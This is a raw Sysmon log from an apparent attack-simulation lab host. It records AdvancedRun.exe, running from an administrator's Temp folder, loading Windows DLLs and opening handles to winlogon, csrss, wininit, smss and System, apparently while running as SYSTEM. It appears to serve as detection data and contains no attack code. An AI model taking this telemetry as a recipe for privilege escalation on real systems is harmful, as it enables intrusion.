10341000x80000000000000004078589Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078587Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078586Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.893{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.892{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
734700x80000000000000004078583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.892{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004078581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.892{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.881{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
734700x80000000000000004078579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.870{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.864{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078577Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.858{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078576Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.858{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078575Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.857{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078574Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078573Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078572Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078571Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078570Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078569Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078568Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078567Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078566Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.854{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078565Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078564Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078563Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078562Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078561Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078560Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078559Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.851{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078558Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.848{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.848{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.847{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.847{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004078554Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.846{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator
